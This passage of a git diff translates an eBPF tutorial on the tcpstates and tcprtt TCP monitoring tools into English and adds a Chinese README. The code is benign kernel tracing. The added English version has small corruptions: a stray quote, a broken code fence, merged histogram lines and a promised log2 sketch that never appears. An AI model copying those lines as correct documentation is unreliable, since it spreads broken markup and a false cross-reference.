Process the received events, convert them into a human-readable format, and print them. -以上就是`tcpstates`程序用户态部分的主要实现逻辑。通过这一章的学习,你应该已经对如何在用户态处理内核事件有了更深入的理解。在下一章中,我们将介绍更多关于如何使用 eBPF 进行网络监控的知识。 +The above is the main implementation logic of the user-space part of the `tcpstates` program. Through this chapter, you should have gained a deeper understanding of how to handle kernel events in user space. In the next chapter, we will introduce more knowledge about using eBPF for network monitoring. -### tcprtt +### tcprtt kernel eBPF code -在本章节中,我们将分析`tcprtt` eBPF 程序的内核态代码。`tcprtt`是一个用于测量 TCP 往返时间(Round Trip Time, RTT)的程序,它将 RTT 的信息统计到一个 histogram 中。 +In this section, we will analyze the kernel BPF code of the `tcprtt` eBPF program. `tcprtt` is a program used to measure TCP Round Trip Time (RTT) and stores the RTT information in a histogram. ```c - /// @sample {"interval": 1000, "type" : "log2_hist"} struct { __uint(type, BPF_MAP_TYPE_HASH); @@ -246,44 +243,50 @@ int BPF_PROG(tcp_rcv, struct sock *sk) } ``` -首先,我们定义了一个 hash 类型的 eBPF map,名为`hists`,它用来存储 RTT 的统计信息。在这个 map 中,键是 64 位整数,值是一个`hist`结构,这个结构包含了一个数组,用来存储不同 RTT 区间的数量。 +The code above declares a map called `hists`, which is a hash map used to store the histogram data. The `hists` map has a maximum number of entries defined as `MAX_ENTRIES`. -接着,我们定义了一个 eBPF 程序,名为`tcp_rcv`,这个程序会在每次内核中处理 TCP 收包的时候被调用。在这个程序中,我们首先根据过滤条件(源/目标 IP 地址和端口)对 TCP 连接进行过滤。如果满足条件,我们会根据设置的参数选择相应的 key(源 IP 或者目标 IP 或者 0),然后在`hists` map 中查找或者初始化对应的 histogram。 +The function `BPF_PROG(tcp_rcv, struct sock *sk)` is the entry point of the eBPF program for handling the `tcp_rcv_established` event. Within this function, the program retrieves various information from the network socket and checks if filtering conditions are met. Then, it performs operations on the histogram data structure. Finally, the program calculates the slot for the RTT value and updates the histogram accordingly. -接下来,我们读取 TCP 连接的`srtt_us`字段,这个字段表示了平滑的 RTT 值,单位是微秒。然后我们将这个 RTT 值转换为对数形式,并将其作为 slot 存储到 histogram 中。 +This is the main code logic of the `tcprtt` eBPF program in kernel mode. The eBPF program measures the RTT of TCP connections and maintains a histogram to collect and analyze the RTT data. -如果设置了`show_ext`参数,我们还会将 RTT 值和计数器累加到 histogram 的`latency`和`cnt`字段中。 +First, we define a hash type eBPF map called `hists`, which is used to store statistics information about RTT. In this map, the key is a 64-bit integer, and the value is a `hist` structure that contains an array to store the count of different RTT intervals. -通过以上的处理,我们可以对每个 TCP 连接的 RTT 进行统计和分析,从而更好地理解网络的性能状况。 +Next, we define an eBPF program called `tcp_rcv` which will be called every time a TCP packet is received in the kernel. In this program, we first filter TCP connections based on filtering conditions (source/destination IP address and port). If the conditions are met, we select the corresponding key (source IP, destination IP, or 0) based on the set parameters, and then look up or initialize the corresponding histogram in the `hists` map. -总结起来,`tcprtt` eBPF 程序的主要逻辑包括以下几个步骤: +Then, we read the `srtt_us` field of the TCP connection, which represents the smoothed RTT value in microseconds. We convert this RTT value to a logarithmic form and store it as a slot in the histogram (a small user-space sketch of this log2 bucketing appears at the end of this section). -1. 根据过滤条件对 TCP 连接进行过滤。 -2. 在`hists` map 中查找或者初始化对应的 histogram。 -3. 读取 TCP 连接的`srtt_us`字段,并将其转换为对数形式,存储到 histogram 中。 -4.
如果设置了`show_ext`参数,我们还会将 RTT 值和计数器累加到 histogram 的`latency`和`cnt`字段中。 +If the `show_ext` parameter is set, we also increment the RTT value and the counter in the `latency` and `cnt` fields of the histogram. -tcprtt 挂载到了内核态的 tcp_rcv_established 函数上: +With the above processing, we can analyze and track the RTT of each TCP connection to better understand the network performance. + +In summary, the main logic of the `tcprtt` eBPF program includes the following steps: + +1. Filter TCP connections based on filtering conditions. +2. Look up or initialize the corresponding histogram in the `hists` map. +3. Read the `srtt_us` field of the TCP connection, convert it to a logarithmic form, and store it in the histogram. +4. If the `show_ext` parameter is set, increment the RTT value and the counter in the `latency` and `cnt` fields of the histogram. + +`tcprtt` is attached to the kernel's `tcp_rcv_established` function: ```c void tcp_rcv_established(struct sock *sk, struct sk_buff *skb); ``` -这个函数是在内核中处理TCP接收数据的主要函数,主要在TCP连接处于`ESTABLISHED`状态时被调用。这个函数的处理逻辑包括一个快速路径和一个慢速路径。快速路径在以下几种情况下会被禁用: +This function is the main function in the kernel for processing received TCP data and is called when a TCP connection is in the `ESTABLISHED` state. The processing logic of this function includes a fast path and a slow path. The fast path is disabled in the following cases: -- 我们宣布了一个零窗口 - 零窗口探测只能在慢速路径中正确处理。 -- 收到了乱序的数据包。 -- 期待接收紧急数据。 -- 没有剩余的缓冲区空间。 -- 接收到了意外的TCP标志/窗口值/头部长度(通过检查TCP头部与预设标志进行检测)。 -- 数据在两个方向上都在传输。快速路径只支持纯发送者或纯接收者(这意味着序列号或确认值必须保持不变)。 -- 接收到了意外的TCP选项。 +- We have advertised a zero window - zero window probing can only be handled correctly in the slow path. +- Out-of-order data packets received. +- Expecting to receive urgent data. +- No remaining buffer space. +- Received unexpected TCP flags/window values/header lengths (detected by checking TCP header against the expected flags). +- Data is being transmitted in both directions. The fast path only supports pure senders or pure receivers (meaning the sequence number or acknowledgement value must remain unchanged). +- Received unexpected TCP options. -当这些条件不满足时,它会进入一个标准的接收处理过程,这个过程遵循RFC793来处理所有情况。前三种情况可以通过正确的预设标志设置来保证,剩下的情况则需要内联检查。当一切都正常时,快速处理过程会在`tcp_data_queue`函数中被开启。 +When these conditions are not met, it enters the standard receive path, which follows RFC 793 to handle all cases. The first three cases can be ensured by setting the correct expected flags, while the remaining cases require inline checks. When everything is normal, the fast processing path is invoked in the `tcp_data_queue` function. -## 编译运行 +## Compilation and Execution -对于 tcpstates,可以通过以下命令编译和运行 libbpf 应用: +For `tcpstates`, you can compile and run the libbpf application with the following command: ```console $ make @@ -295,8 +298,8 @@ $ make $ sudo ./tcpstates SKADDR PID COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS ffff9bf61bb62bc0 164978 node 192.168.88.15 0 52.178.17.2 443 CLOSE -> SYN_SENT 0.000 -ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794 -ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454 +ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794
+"ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454 ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 CLOSE_WAIT -> LAST_ACK 0.793 ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> LAST_ACK 0.086 ffff9bf61bb62bc0 228759 kworker/u6 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> CLOSE 0.193 @@ -305,7 +308,7 @@ ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 ffff9bf7109d6900 88750 node 127.0.0.1 39755 127.0.0.1 50966 ESTABLISHED -> FIN_WAIT1 0.000 ``` -对于 tcprtt,我们可以使用 eunomia-bpf 编译运行这个例子: +For tcprtt, we can use eunomia-bpf to compile and run this example: Compile: @@ -313,7 +316,7 @@ Compile: docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或者 +Or ```console $ ecc tcprtt.bpf.c tcprtt.h @@ -322,13 +325,12 @@ Generating export types... Packing ebpf object and config into package.json... ``` -运行: +Run: ```console $ sudo ecli run package.json -h A simple eBPF program - Usage: package.json [OPTIONS] Options: @@ -344,8 +346,8 @@ Options: -h, --help Print help -V, --version Print version -Built with eunomia-bpf framework. -See https://github.com/eunomia-bpf/eunomia-bpf for more information. +Built with eunomia-bpf framework.". +```See https://github.com/eunomia-bpf/eunomia-bpf for more information. $ sudo ecli run package.json key = 0 @@ -380,26 +382,27 @@ cnt = 0 32 -> 63 : 0 | | 64 -> 127 : 0 | | 128 -> 255 : 0 | | - 256 -> 511 : 0 | | - 512 -> 1023 : 11 |*************************** | + 256 -> 511 : 0 | |512 -> 1023 : 11 |*************************** | 1024 -> 2047 : 1 |** | 2048 -> 4095 : 0 | | 4096 -> 8191 : 16 |****************************************| 8192 -> 16383 : 4 |********** | ``` -完整源代码: +Complete source code: - -参考资料: +References: - [tcpstates](https://github.com/iovisor/bcc/blob/master/tools/tcpstates_example.txt) - [tcprtt](https://github.com/iovisor/bcc/blob/master/tools/tcprtt.py) - [libbpf-tools/tcpstates]() -## 总结 +## Summary -通过本篇 eBPF 入门实践教程,我们学习了如何使用tcpstates和tcprtt这两个 eBPF 示例程序,监控和分析 TCP 的连接状态和往返时间。我们了解了tcpstates和tcprtt的工作原理和实现方式,包括如何使用 BPF map 存储数据,如何在 eBPF 程序中获取和处理 TCP 连接信息,以及如何在用户态应用程序中解析和显示 eBPF 程序收集的数据。 +In this eBPF introductory tutorial, we learned how to use the tcpstates and tcprtt eBPF example programs to monitor and analyze the connection states and round-trip time of TCP. We understood the working principles and implementation methods of tcpstates and tcprtt, including how to store data using BPF maps, how to retrieve and process TCP connection information in eBPF programs, and how to parse and display the data collected by eBPF programs in user-space applications. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。 +If you would like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. The upcoming tutorials will further explore advanced features of eBPF, and we will continue to share more content about eBPF development practices. 
+ +> The original link of this article: diff --git a/src/14-tcpstates/README.zh.md b/src/14-tcpstates/README.zh.md new file mode 100644 index 0000000..6bf2c8d --- /dev/null +++ b/src/14-tcpstates/README.zh.md @@ -0,0 +1,405 @@ +# eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT + +eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 + +在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍两个示例程序:`tcpstates` 和 `tcprtt`。`tcpstates` 用于记录 TCP 连接的状态变化,而 `tcprtt` 则用于记录 TCP 的往返时间 (RTT, Round-Trip Time)。 + +## `tcprtt` 与 `tcpstates` + +网络质量在当前的互联网环境中至关重要。影响网络质量的因素有许多,包括硬件、网络环境、软件编程的质量等。为了帮助用户更好地定位网络问题,我们引入了 `tcprtt` 这个工具。`tcprtt` 可以监控 TCP 链接的往返时间,从而评估网络质量,帮助用户找出可能的问题所在。 + +当 TCP 链接建立时,`tcprtt` 会自动根据当前系统的状况,选择合适的执行函数。在执行函数中,`tcprtt` 会收集 TCP 链接的各项基本信息,如源地址、目标地址、源端口、目标端口、耗时等,并将这些信息更新到直方图型的 BPF map 中。运行结束后,`tcprtt` 会通过用户态代码,将收集的信息以图形化的方式展示给用户。 + +`tcpstates` 则是一个专门用来追踪和打印 TCP 连接状态变化的工具。它可以显示 TCP 连接在每个状态中的停留时长,单位为毫秒。例如,对于一个单独的 TCP 会话,`tcpstates` 可以打印出类似以下的输出: + +```sh +SKADDR C-PID C-COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS +ffff9fd7e8192000 22384 curl 100.66.100.185 0 52.33.159.26 80 CLOSE -> SYN_SENT 0.000 +ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 SYN_SENT -> ESTABLISHED 1.373 +ffff9fd7e8192000 22384 curl 100.66.100.185 63446 52.33.159.26 80 ESTABLISHED -> FIN_WAIT1 176.042 +ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT1 -> FIN_WAIT2 0.536 +ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT2 -> CLOSE 0.006 +``` + +以上输出中,最多的时间被花在了 ESTABLISHED 状态,也就是连接已经建立并在传输数据的状态,这个状态到 FIN_WAIT1 状态(开始关闭连接的状态)的转变过程中耗费了 176.042 毫秒。 + +在我们接下来的教程中,我们会更深入地探讨这两个工具,解释它们的实现原理,希望这些内容对你在使用 eBPF 进行网络和性能分析方面的工作有所帮助。 + +## tcpstate + +由于篇幅所限,这里我们主要讨论和分析对应的 eBPF 内核态代码实现。以下是 tcpstate 的 eBPF 代码: + +```c +const volatile bool filter_by_sport = false; +const volatile bool filter_by_dport = false; +const volatile short target_family = 0; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, __u16); + __type(value, __u16); +} sports SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, __u16); + __type(value, __u16); +} dports SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, struct sock *); + __type(value, __u64); +} timestamps SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(__u32)); + __uint(value_size, sizeof(__u32)); +} events SEC(".maps"); + +SEC("tracepoint/sock/inet_sock_set_state") +int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx) +{ + struct sock *sk = (struct sock *)ctx->skaddr; + __u16 family = ctx->family; + __u16 sport = ctx->sport; + __u16 dport = ctx->dport; + __u64 *tsp, delta_us, ts; + struct event event = {}; + + if (ctx->protocol != IPPROTO_TCP) + return 0; + + if (target_family && target_family != family) + return 0; + + if (filter_by_sport && !bpf_map_lookup_elem(&sports, &sport)) + return 0; + + if (filter_by_dport && !bpf_map_lookup_elem(&dports, &dport)) + return 0; + + tsp = bpf_map_lookup_elem(&timestamps, &sk); + ts = bpf_ktime_get_ns(); + if (!tsp) + delta_us = 0; + else + delta_us = (ts - *tsp) / 1000; + + event.skaddr = (__u64)sk; + event.ts_us = ts / 1000; + event.delta_us = delta_us; + event.pid = bpf_get_current_pid_tgid() >> 32; + event.oldstate = ctx->oldstate; + event.newstate = ctx->newstate; + event.family = family; + event.sport = sport; + event.dport = dport; + 
bpf_get_current_comm(&event.task, sizeof(event.task)); + + if (family == AF_INET) { + bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_rcv_saddr); + bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_daddr); + } else { /* family == AF_INET6 */ + bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); + bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32); + } + + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event)); + + if (ctx->newstate == TCP_CLOSE) + bpf_map_delete_elem(&timestamps, &sk); + else + bpf_map_update_elem(&timestamps, &sk, &ts, BPF_ANY); + + return 0; +} +``` + +`tcpstates`主要依赖于 eBPF 的 Tracepoints 来捕获 TCP 连接的状态变化,从而跟踪 TCP 连接在每个状态下的停留时间。 + +### 定义 BPF Maps + +在`tcpstates`程序中,首先定义了几个 BPF Maps,它们是 eBPF 程序和用户态程序之间交互的主要方式。`sports`和`dports`分别用于存储源端口和目标端口,用于过滤 TCP 连接;`timestamps`用于存储每个 TCP 连接的时间戳,以计算每个状态的停留时间;`events`则是一个 perf_event 类型的 map,用于将事件数据发送到用户态。 + +### 追踪 TCP 连接状态变化 + +程序定义了一个名为`handle_set_state`的函数,该函数是一个 tracepoint 类型的程序,它将被挂载到`sock/inet_sock_set_state`这个内核 tracepoint 上。每当 TCP 连接状态发生变化时,这个 tracepoint 就会被触发,然后执行`handle_set_state`函数。 + +在`handle_set_state`函数中,首先通过一系列条件判断确定是否需要处理当前的 TCP 连接,然后从`timestamps` map 中获取当前连接的上一个时间戳,然后计算出停留在当前状态的时间。接着,程序将收集到的数据放入一个 event 结构体中,并通过`bpf_perf_event_output`函数将该 event 发送到用户态。 + +### 更新时间戳 + +最后,根据 TCP 连接的新状态,程序将进行不同的操作:如果新状态为 TCP_CLOSE,表示连接已关闭,程序将从`timestamps` map 中删除该连接的时间戳;否则,程序将更新该连接的时间戳。 + +用户态的部分主要是通过 libbpf 来加载 eBPF 程序,然后通过 perf_event 来接收内核中的事件数据: + +```c +static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { + char ts[32], saddr[26], daddr[26]; + struct event* e = data; + struct tm* tm; + int family; + time_t t; + + if (emit_timestamp) { + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%8s ", ts); + } + + inet_ntop(e->family, &e->saddr, saddr, sizeof(saddr)); + inet_ntop(e->family, &e->daddr, daddr, sizeof(daddr)); + if (wide_output) { + family = e->family == AF_INET ? 4 : 6; + printf( + "%-16llx %-7d %-16s %-2d %-26s %-5d %-26s %-5d %-11s -> %-11s " + "%.3f\n", + e->skaddr, e->pid, e->task, family, saddr, e->sport, daddr, + e->dport, tcp_states[e->oldstate], tcp_states[e->newstate], + (double)e->delta_us / 1000); + } else { + printf( + "%-16llx %-7d %-10.10s %-15s %-5d %-15s %-5d %-11s -> %-11s %.3f\n", + e->skaddr, e->pid, e->task, saddr, e->sport, daddr, e->dport, + tcp_states[e->oldstate], tcp_states[e->newstate], + (double)e->delta_us / 1000); + } +} +``` + +`handle_event`就是这样一个回调函数,它会被 perf_event 调用,每当内核有新的事件到达时,它就会处理这些事件。 + +在`handle_event`函数中,我们首先通过`inet_ntop`函数将二进制的 IP 地址转换成人类可读的格式,然后根据是否需要输出宽格式,分别打印不同的信息。这些信息包括了事件的时间戳、源 IP 地址、源端口、目标 IP 地址、目标端口、旧状态、新状态以及在旧状态停留的时间。 + +这样,用户就可以清晰地看到 TCP 连接状态的变化,以及每个状态的停留时间,从而帮助他们诊断网络问题。 + +总结起来,用户态部分的处理主要涉及到了以下几个步骤: + +1. 使用 libbpf 加载并运行 eBPF 程序。 +2. 设置回调函数来接收内核发送的事件。 +3. 
处理接收到的事件,将其转换成人类可读的格式并打印。 + +以上就是`tcpstates`程序用户态部分的主要实现逻辑。通过这一章的学习,你应该已经对如何在用户态处理内核事件有了更深入的理解。在下一章中,我们将介绍更多关于如何使用 eBPF 进行网络监控的知识。 + +### tcprtt + +在本章节中,我们将分析`tcprtt` eBPF 程序的内核态代码。`tcprtt`是一个用于测量 TCP 往返时间(Round Trip Time, RTT)的程序,它将 RTT 的信息统计到一个 histogram 中。 + +```c + +/// @sample {"interval": 1000, "type" : "log2_hist"} +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u64); + __type(value, struct hist); +} hists SEC(".maps"); + +static struct hist zero; + +SEC("fentry/tcp_rcv_established") +int BPF_PROG(tcp_rcv, struct sock *sk) +{ + const struct inet_sock *inet = (struct inet_sock *)(sk); + struct tcp_sock *ts; + struct hist *histp; + u64 key, slot; + u32 srtt; + + if (targ_sport && targ_sport != inet->inet_sport) + return 0; + if (targ_dport && targ_dport != sk->__sk_common.skc_dport) + return 0; + if (targ_saddr && targ_saddr != inet->inet_saddr) + return 0; + if (targ_daddr && targ_daddr != sk->__sk_common.skc_daddr) + return 0; + + if (targ_laddr_hist) + key = inet->inet_saddr; + else if (targ_raddr_hist) + key = inet->sk.__sk_common.skc_daddr; + else + key = 0; + histp = bpf_map_lookup_or_try_init(&hists, &key, &zero); + if (!histp) + return 0; + ts = (struct tcp_sock *)(sk); + srtt = BPF_CORE_READ(ts, srtt_us) >> 3; + if (targ_ms) + srtt /= 1000U; + slot = log2l(srtt); + if (slot >= MAX_SLOTS) + slot = MAX_SLOTS - 1; + __sync_fetch_and_add(&histp->slots[slot], 1); + if (targ_show_ext) { + __sync_fetch_and_add(&histp->latency, srtt); + __sync_fetch_and_add(&histp->cnt, 1); + } + return 0; +} +``` + +首先,我们定义了一个 hash 类型的 eBPF map,名为`hists`,它用来存储 RTT 的统计信息。在这个 map 中,键是 64 位整数,值是一个`hist`结构,这个结构包含了一个数组,用来存储不同 RTT 区间的数量。 + +接着,我们定义了一个 eBPF 程序,名为`tcp_rcv`,这个程序会在每次内核中处理 TCP 收包的时候被调用。在这个程序中,我们首先根据过滤条件(源/目标 IP 地址和端口)对 TCP 连接进行过滤。如果满足条件,我们会根据设置的参数选择相应的 key(源 IP 或者目标 IP 或者 0),然后在`hists` map 中查找或者初始化对应的 histogram。 + +接下来,我们读取 TCP 连接的`srtt_us`字段,这个字段表示了平滑的 RTT 值,单位是微秒。然后我们将这个 RTT 值转换为对数形式,并将其作为 slot 存储到 histogram 中。 + +如果设置了`show_ext`参数,我们还会将 RTT 值和计数器累加到 histogram 的`latency`和`cnt`字段中。 + +通过以上的处理,我们可以对每个 TCP 连接的 RTT 进行统计和分析,从而更好地理解网络的性能状况。 + +总结起来,`tcprtt` eBPF 程序的主要逻辑包括以下几个步骤: + +1. 根据过滤条件对 TCP 连接进行过滤。 +2. 在`hists` map 中查找或者初始化对应的 histogram。 +3. 读取 TCP 连接的`srtt_us`字段,并将其转换为对数形式,存储到 histogram 中。 +4. 如果设置了`show_ext`参数,将 RTT 值和计数器累加到 histogram 的`latency`和`cnt`字段中。 + +tcprtt 挂载到了内核态的 tcp_rcv_established 函数上: + +```c +void tcp_rcv_established(struct sock *sk, struct sk_buff *skb); +``` + +这个函数是在内核中处理TCP接收数据的主要函数,主要在TCP连接处于`ESTABLISHED`状态时被调用。这个函数的处理逻辑包括一个快速路径和一个慢速路径。快速路径在以下几种情况下会被禁用: + +- 我们宣布了一个零窗口 - 零窗口探测只能在慢速路径中正确处理。 +- 收到了乱序的数据包。 +- 期待接收紧急数据。 +- 没有剩余的缓冲区空间。 +- 接收到了意外的TCP标志/窗口值/头部长度(通过检查TCP头部与预设标志进行检测)。 +- 数据在两个方向上都在传输。快速路径只支持纯发送者或纯接收者(这意味着序列号或确认值必须保持不变)。 +- 接收到了意外的TCP选项。 + +当这些条件不满足时,它会进入一个标准的接收处理过程,这个过程遵循RFC793来处理所有情况。前三种情况可以通过正确的预设标志设置来保证,剩下的情况则需要内联检查。当一切都正常时,快速处理过程会在`tcp_data_queue`函数中被开启。 + +## 编译运行 + +对于 tcpstates,可以通过以下命令编译和运行 libbpf 应用: + +```console +$ make +... 
+ BPF .output/tcpstates.bpf.o + GEN-SKEL .output/tcpstates.skel.h + CC .output/tcpstates.o + BINARY tcpstates +$ sudo ./tcpstates +SKADDR PID COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS +ffff9bf61bb62bc0 164978 node 192.168.88.15 0 52.178.17.2 443 CLOSE -> SYN_SENT 0.000 +ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794 +ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454 +ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 CLOSE_WAIT -> LAST_ACK 0.793 +ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> LAST_ACK 0.086 +ffff9bf61bb62bc0 228759 kworker/u6 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> CLOSE 0.193 +ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 CLOSE -> LISTEN 0.000 +ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 LISTEN -> CLOSE 1.763 +ffff9bf7109d6900 88750 node 127.0.0.1 39755 127.0.0.1 50966 ESTABLISHED -> FIN_WAIT1 0.000 +``` + +对于 tcprtt,我们可以使用 eunomia-bpf 编译运行这个例子: + +Compile: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或者 + +```console +$ ecc tcprtt.bpf.c tcprtt.h +Compiling bpf object... +Generating export types... +Packing ebpf object and config into package.json... +``` + +运行: + +```console +$ sudo ecli run package.json -h +A simple eBPF program + + +Usage: package.json [OPTIONS] + +Options: + --verbose Whether to show libbpf debug information + --targ_laddr_hist Set value of `bool` variable targ_laddr_hist + --targ_raddr_hist Set value of `bool` variable targ_raddr_hist + --targ_show_ext Set value of `bool` variable targ_show_ext + --targ_sport Set value of `__u16` variable targ_sport + --targ_dport Set value of `__u16` variable targ_dport + --targ_saddr Set value of `__u32` variable targ_saddr + --targ_daddr Set value of `__u32` variable targ_daddr + --targ_ms Set value of `bool` variable targ_ms + -h, --help Print help + -V, --version Print version + +Built with eunomia-bpf framework. +See https://github.com/eunomia-bpf/eunomia-bpf for more information. 
+ +$ sudo ecli run package.json +key = 0 +latency = 0 +cnt = 0 + + (unit) : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 0 | | + 32 -> 63 : 0 | | + 64 -> 127 : 0 | | + 128 -> 255 : 0 | | + 256 -> 511 : 0 | | + 512 -> 1023 : 4 |******************** | + 1024 -> 2047 : 1 |***** | + 2048 -> 4095 : 0 | | + 4096 -> 8191 : 8 |****************************************| + +key = 0 +latency = 0 +cnt = 0 + + (unit) : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 0 | | + 32 -> 63 : 0 | | + 64 -> 127 : 0 | | + 128 -> 255 : 0 | | + 256 -> 511 : 0 | | + 512 -> 1023 : 11 |*************************** | + 1024 -> 2047 : 1 |** | + 2048 -> 4095 : 0 | | + 4096 -> 8191 : 16 |****************************************| + 8192 -> 16383 : 4 |********** | +``` + +完整源代码: + +- + +参考资料: + +- [tcpstates](https://github.com/iovisor/bcc/blob/master/tools/tcpstates_example.txt) +- [tcprtt](https://github.com/iovisor/bcc/blob/master/tools/tcprtt.py) +- [libbpf-tools/tcpstates]() + +## 总结 + +通过本篇 eBPF 入门实践教程,我们学习了如何使用tcpstates和tcprtt这两个 eBPF 示例程序,监控和分析 TCP 的连接状态和往返时间。我们了解了tcpstates和tcprtt的工作原理和实现方式,包括如何使用 BPF map 存储数据,如何在 eBPF 程序中获取和处理 TCP 连接信息,以及如何在用户态应用程序中解析和显示 eBPF 程序收集的数据。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。 diff --git a/src/14-tcpstates/README_en.md b/src/14-tcpstates/README_en.md deleted file mode 100644 index 189474d..0000000 --- a/src/14-tcpstates/README_en.md +++ /dev/null @@ -1,408 +0,0 @@ -# eBPF Tutorial by Example 14: Recording TCP Connection Status and TCP RTT - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. - -In this article of our eBPF Tutorial by Example series, we will introduce two sample programs: `tcpstates` and `tcprtt`. `tcpstates` is used to record the state changes of TCP connections, while `tcprtt` is used to record the Round-Trip Time (RTT) of TCP. - -## `tcprtt` and `tcpstates` - -Network quality is crucial in the current Internet environment. There are many factors that affect network quality, including hardware, network environment, and the quality of software programming. To help users better locate network issues, we introduce the tool `tcprtt`. `tcprtt` can monitor the Round-Trip Time of TCP connections, evaluate network quality, and help users identify potential problems. - -When a TCP connection is established, `tcprtt` automatically selects the appropriate execution function based on the current system conditions. In the execution function, `tcprtt` collects various basic information of the TCP connection, such as source address, destination address, source port, destination port, and time elapsed, and updates this information to a histogram-like BPF map. After the execution is completed, `tcprtt` presents the collected information graphically to users through user-mode code. - -`tcpstates` is a tool specifically designed to track and print changes in TCP connection status. It can display the duration of TCP connections in each state, measured in milliseconds. 
For example, for a single TCP session, `tcpstates` can print output similar to the following: - -```sh -SKADDR C-PID C-COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS -ffff9fd7e8192000 22384 curl 100.66.100.185 0 52.33.159.26 80 CLOSE -> SYN_SENT 0.000 -ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 SYN_SENT -> ESTABLISHED 1.373 -ffff9fd7e8192000 22384 curl 100.66.100.185 63446 52.33.159.26 80 ESTABLISHED -> FIN_WAIT1 176.042 -ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT1 -> FIN_WAIT2 0.536 -ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT2 -> CLOSE 0.006 -``` - -In the above output, the most time is spent in the ESTABLISHED state, which indicates that the connection has been established and data transmission is in progress. The transition from this state to the FIN_WAIT1 state (the beginning of connection closure) took 176.042 milliseconds. - -In our upcoming tutorials, we will delve deeper into these two tools, explaining their implementation principles, and hopefully, these contents will help you in your work with eBPF for network and performance analysis. - -## tcpstate eBPF code - -Due to space constraints, here we mainly discuss and analyze the corresponding eBPF kernel-mode code implementation. The following is the eBPF code for tcpstate: - -```c -const volatile bool filter_by_sport = false; -const volatile bool filter_by_dport = false; -const volatile short target_family = 0; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, __u16); - __type(value, 